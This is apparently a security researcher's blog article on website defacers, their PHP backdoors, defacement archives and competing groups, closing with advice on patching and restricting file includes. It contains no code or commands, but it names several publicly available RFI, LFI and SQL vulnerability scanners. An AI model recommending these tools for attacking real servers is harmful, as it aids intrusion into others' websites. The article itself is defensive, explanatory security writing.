IntroductionMy fellow researcher Tim Armstrong (from Kaspersky Lab USA) and I recently took a quick look at a tool used by defacers to report mass defacements to a big defacement archive. The website with the defacement tool also offered a PHP backdoor. Out of curiosity I did some Google queries to see how common the PHP backdoor was and if I would come across even more PHP backdoors and/or hundreds of compromised servers running various PHP backdoors.
I then started to look into how these backdoors are placed on the servers, and what techniques and methods the attackers use.
Overall, the entire setup is pretty simple but before going into detail, I’d like to clarify the terminology used in this article to refer to attackers. The terms “defacers”, “crackers” and “hackers” are all used in the community, but the media tends to refer to such attackers simply as “hackers”. However, I prefer to use the term “defacers” to refer to the people behind these tools and defacement games.
A defacer is someone who doesn’t really care which site they attack; their main aim is simply to find and exploit a vulnerability on a server and then either replace the website content, or upload a file indicating that they were there. No one really knows why defacers do this, as there is no monetary gain. However, a look at some of the exploit archives indicates that different defacements groups are competing against each other. As mentioned above, although the media tends to refer to such people as hackers, I would say that “real” hackers don’t attack random sites, but rather use their knowledge to conduct targeted attacks. Hackers purposefully try to prevent site owners becoming aware of attacks, and do what they can to erase all evidence of the attack.
Attacks performed by defacers are often referred to as “defacements”; there are large websites which act as defacement archives, and groups compete against each other to see which group can deface the most websites. These archives are publically accessible, meaning that all groups can see how many points they (or other groups) have.
As I have mentioned, the defacers aren’t selective in their targets; in most cases they just use automated tools to find vulnerable servers, and automatically exploit them. The exploit automatically uploads a backdoor to the compromised server which will provide, for example, shell access to the compromised server. The defacer can launch further attacks via the backdoor, such as trying to escalate privileges using local kernel exploits, or reporting the compromised server to a defacement archive. These backdoors are also sold on the black market, enabling buyers to, for example, turn a compromised server into a node in a DDoS network, or use it as spam relay host.
Once an attack has been conducted, the defacement will automatically be reported to an archive. Below is a screenshot from a backdoor which reports back to a large defacement archive:
The methodsThe methods used by defacers tend to be very similar, even across different groups: they have scanners which will identify vulnerable servers to exploit, and then will upload backdoors that report about the infected server to the attacker, and sometimes serve as additional scanners.
In most cases, the exploits used are publically available rather than zero-day. The following screenshot provides a glimpse of publically available vulnerabilities on a given day.
Below is a screenshot of a site offering “Google Dorks” for VopCrew IJO Scanner v1.2
The toolsThe tools defacers use to find new vulnerable servers mainly check for two types of vulnerabilities: Remote or Local File Include vulnerabilities. Here’s a partial list of such free tools, all of which are publically available:
- LFI intruder
- VopCrew IJO Scanner v1.2
- Single LFI vulnerable scanner
- SCT SQL SCANNER
- Priv8 RFI SCANNER v3.0
- PITBULL RFI-LFI SCANNER
- Osirys SQL RFI LFI SCANNER
- FeeLCoMz RFI Scanner Bot v5.0 By FaTaLisTiCz_Fx
The solutionOne major problem in combating defacements is that defacers aren’t only exploiting technical vulnerabilities, they are also exploiting ignorance. Most people who work with webservers today do not understand the importance of having a system which is up-to-date and fully patched.
Even though patching is important and relatively simple, for some reasons, one of the most common security issues is a failure to keep on top of patching. Companies and organizations often put a lot of time and effort into teaching their IT personnel about how SQL injection and buffer overflows work, and how they can be exploited, when it would be more sensible to focus on ensuring that systems are fully patched and configured properly.
Another major issue is that administrators automatically assume that Linux/Unix is more secure than Windows, and simply don’t do any local hardening, or configuration.
Proper configuration can more or less eliminate certain types of exploits. For instance, many of the exploits mentioned in this article are “File Include” type vulnerabilities, which enable an attacker to include any arbitrary file he wants; in some cases these files can be from external websites. Simply specifying which directory a specific web application or website is allowed to include files from will effectively protect against this type of exploitation.